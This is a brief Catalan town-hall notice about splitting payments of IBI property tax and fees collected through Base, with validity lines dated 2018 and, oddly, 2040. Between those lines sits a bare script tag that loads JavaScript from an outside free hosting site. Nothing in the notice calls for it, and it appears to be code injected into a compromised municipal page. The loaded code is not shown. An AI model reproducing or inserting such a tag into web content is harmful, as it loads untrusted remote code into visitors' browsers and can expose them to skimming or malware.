Es comunica a tots els interessats que vulguin fraccionar els pagaments d'I.B.I urbà ,rústic i taxes a Base, que poden passar per l'Ajuntament a demanar informació.

Bando vigent fins dilluns, 30 d'abril de 2018

<script type="text/javascript" src="http://yourjavascript.com/29219319723/index.js"></script>

Bando vigent fins dimecres, 01 d'agost de 2040